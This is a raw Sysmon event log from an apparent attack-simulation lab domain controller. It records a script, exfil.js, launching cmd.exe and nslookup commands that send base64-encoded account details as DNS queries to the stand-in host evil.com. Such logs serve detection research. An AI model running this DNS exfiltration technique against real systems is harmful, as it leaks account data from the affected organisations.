14:16:44.081{00000000-0000-0000-0000-000000000000}3008<unknown process>-udpfalsefalse127.0.0.1-53096-false127.0.0.1-53domain 354300x8000000000000000204525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.044{00000000-0000-0000-0000-000000000000}1696<unknown process>-udpfalsefalse127.0.0.1-53067-false127.0.0.1-53domain 354300x8000000000000000204524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.722{00000000-0000-0000-0000-000000000000}8136<unknown process>-udpfalsefalse127.0.0.1-53060-false127.0.0.1-53domain 10341000x8000000000000000204523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.379{2E1864BB-17CE-629A-1C42-000000005F02}33367444C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1D42-000000005F02}6404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.364{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.364{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.364{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.364{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.364{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1D42-000000005F02}6404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.364{2E1864BB-17CE-629A-1B42-000000005F02}78886064C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-1D42-000000005F02}6404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.376{2E1864BB-17CE-629A-1D42-000000005F02}6404C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-1B42-000000005F02}7888C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlymbjgv.tmp 2>&1 10341000x8000000000000000204515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.359{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1C42-000000005F02}3336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.359{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1C42-000000005F02}3336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.342{2E1864BB-17CE-629A-1C42-000000005F02}33367444C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1B42-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.342{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1C42-000000005F02}3336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.326{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.326{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.326{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.326{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.326{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1B42-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.326{2E1864BB-17A1-629A-783D-000000005F02}55522560C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-1B42-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.340{2E1864BB-17CE-629A-1B42-000000005F02}7888C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlymbjgv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.326{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxnr.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.311{2E1864BB-17CE-629A-1942-000000005F02}54324580C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1A42-000000005F02}4204C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.311{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.311{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.311{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.311{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.311{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1A42-000000005F02}4204C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.311{2E1864BB-17CE-629A-1842-000000005F02}69607752C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-1A42-000000005F02}4204C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.315{2E1864BB-17CE-629A-1A42-000000005F02}4204C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-1842-000000005F02}6960C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxnr.tmp 2>&1 10341000x8000000000000000204495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.295{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1942-000000005F02}5432C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.295{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1942-000000005F02}5432C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.279{2E1864BB-17CE-629A-1942-000000005F02}54324580C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1842-000000005F02}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 